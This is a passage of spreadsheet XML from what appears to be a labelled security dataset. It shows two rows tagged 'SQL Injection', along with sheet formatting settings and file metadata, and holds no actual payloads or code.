        <v>1</v>
      </c>
      <c r="C39489" s="7" t="str">
        <f t="shared" si="616"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="39490" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A39490" s="1" t="s">
        <v>37538</v>
      </c>
      <c r="B39490">
        <v>1</v>
      </c>
      <c r="C39490" s="7" t="str">
        <f t="shared" si="616"/>
        <v>SQL Injection</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection formatCells="0" formatColumns="0" formatRows="0" insertColumns="0" insertRows="0" insertHyperlinks="0" deleteColumns="0" deleteRows="0" sort="0" autoFilter="0" pivotTables="0"/>
  <sortState ref="A2:B48966">
    <sortCondition ref="A1"/>
  </sortState>
  <conditionalFormatting sqref="A1:A3258 A3260:A39489 A39491:A1048576">
    <cfRule type="duplicateValues" dxfId="2" priority="3"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="A3259">
    <cfRule type="duplicateValues" dxfId="1" priority="2"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="A39490">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HP</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-06-28T13:56:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-28T22:38:56Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>